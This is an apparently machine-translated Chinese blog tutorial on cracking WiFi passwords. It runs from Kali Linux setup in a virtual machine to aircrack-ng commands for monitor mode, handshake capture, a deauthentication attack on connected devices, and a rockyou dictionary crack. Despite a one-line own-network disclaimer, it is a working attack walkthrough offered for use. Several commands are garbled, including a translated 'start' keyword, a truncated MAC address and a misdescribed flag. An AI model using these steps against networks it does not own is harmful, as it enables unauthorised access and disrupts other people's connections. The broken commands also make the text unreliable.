免责声明:破解其他人的wifi是违法的,因此我将使用我自己的wifi进行演示。
首先我先给大家简单介绍一下某款破解wifi的钥匙的工作原理,简单来说就是流氓行为。为什么这么说呢?因为它的工作原理就是当你用它“破解”别人的密码的时候,其实你并不是在破解密码,它只是在跟你分享别人的密码而已。你可能很高兴它能跟你分享密码,但是别忘了,只要你打开它,它就能分享别人的密码,包括你家里的wifi密码。说白了,这个钥匙就是一个收集了很多人wifi密码的非常厉害的数据库(这难道不就是流氓行为吗!)所以,我这里就给大家介绍真正的密码破解(一点都不是流氓,只是有点粗鲁~)
可以用物理机破解,这里只介绍用虚拟机破解(比较安全)
虚拟机
在说破解wifi之前,我先给大家讲一下虚拟机,你可能会问这是什么鬼,别慌,我来告诉你它是什么,它是一个可以帮助我们在一台电脑上使用多个系统的平台,有了它,你可以使用XP,win7,win8,win10,除了Windows,还可以使用Linux系列(我觉得这个系统在很多方面都比Windows强,这也解释了为什么我国的超级计算机“太湖之光”的系统也是基于它的。缺点:和Windows相比,用户界面不是很友好,但也还不错,普通人还是比较喜欢用Windows的)当然还有很多其他的系统,就不一一列举了,看图,长这样(我的版本比较老,现在已经出到12了,有兴趣的可以去VMware官网下载)
破解工具kali
Kali Linux 是 Linux 系列中 Debian 系统的修改版,专门用来做渗透测试(黑客很喜欢用,ps:作者是个电脑白痴),能干的事情很多,通过它可以破解 wifi、查询漏洞、破解家里的电脑密码(打开系统的密码,如果不想让室友打开你的电脑,建议在 BIOS 中加密你的电脑,这样就只有你自己能打开你的电脑了,只能说办公室里的电脑感觉很渣,一点安全感都没有)废话不多说,开始安装 Kali
步骤 1:创建虚拟机
选择稍后安装操作系统
到此虚拟物理机就安装完成了,接下来就是更改参数了。
将虚拟机的内存改为1G
这一步是关键,选择你下载的系统镜像(.iso文件)(你可以从网上下载Kali镜像,就像我们平时安装系统一样),选择好之后点击OK就可以了。
第 2 步:安装 Kali 系统
前面我们只是安装了一个空壳,现在我们要往里面安装东西。点击“启动此虚拟机”选项,会出现这个界面。选择查看安装,然后就等着系统安装好了。这里就不重复了。
亮点:破解 wifi 密码(暴力破解,所以我说有点粗鲁)
第一步:打开Kali,打开终端(相当于Windows下打开cmd)
第二步:解压Kali自带的字典(用于破解密码)
在终端中输入命令:gzip -d /usr/share/wordlists/rockyou.txt.gz
步骤3:检查是否有支持监听模式的网卡,台式电脑一般没有(需外置802.11无线网卡),笔记本一般都支持。
输入命令:airmon-ng
显示有一个支持监控模式的网卡设备wlan0
步骤 4:开启监控模式
airmon-ng 启动 wlan0
wlan0变成wlan0mon,表示启动成功
第五步:扫描周围的WiFi信号
airodump-ng wlan0mon
箭头所指的就是我们本次要破解的wifi(我自己的手机热点名称),当找到目标wifi后,按Ctrl+c停止扫描。
第六步:抓包裹(当我们连上WiFi之后,上网的过程就是运送包裹的过程,现在我们就像有了一个爪子,这个爪子的作用就是抓取运输中的包裹【大家都玩过娃娃机,就是那样的】)
airodump-ng -c 11 --bssid E4:46:DA:E9:2D -w ~/ wlan0mon
注:-c:表示信道(也就是目标WiFi信号在哪个信道运行,比如载着包裹的车是在哪个轨道上运行的,因为我们要抓取包裹,所以必须要知道它在哪里运行)。我们可以看到Zeng WiFi是在11信道上。
bssid:表示目标wifi的MAC地址,也就是装了包的车牌号,有车牌号,这辆车就难从我的手里逃脱了(其实mac地址就是网络最底层的ip地址的名字~~我们使用的网络一共有七层,其中有一层叫mac层,大家可以百度一下。)
-w:我们将存储捕获的数据包的位置
第七步:此时我们可以等待目标wifi上的设备断网,导致它重新连接,在它重新连接的那一刻,我们就可以抓包了(相当于制造一个事故,让车紧急接起来停下,然后我们就可以抓包上面了)。
)但是我们时间紧迫,就下达了强制停止的命令(假装是警察)
打开另一个终端,输入红框里的命令
aireplay-ng -0 2 -aE4:46:DA:E9:2D -c E4:F8:9C:7C:15:5F wlan0mon
注:aireplay-ng:表示向目标wifi发送信号包
-0:表示发送的数据包数量
-a:输入目标wifi的mac地址(这里是手机热点)
-c:输入连接设备的mac地址(这里是连接此热点的电脑)
等待抓包,图标表示已抓取目标wifi数据包。
第八步:使用aircrack和kali内置字典(一些数字和字母的组合)破解密码
aircrack-ng -a2 -bE4:46:DA:E9:2D -w /usr/share/wordlists/rockyou.txt ~/*.cap
密码破解成功!
注意:一般纯数字密码几秒钟就能破解(一点都不难),但如果是字母和数字的组合,Kali 自带的字典通常破解不了,必须用更厉害的字典。而且如果字母和数字的组合超过 12 位,破解难度就很大了(黄金密码),几乎不可能破解(专家还是有的),反正我是做不到。如果你的路由器绑定了 MAC 地址,就算密码破解了也没法连接。
本周分享的内容就到这里,如果还有疑问,欢迎留言。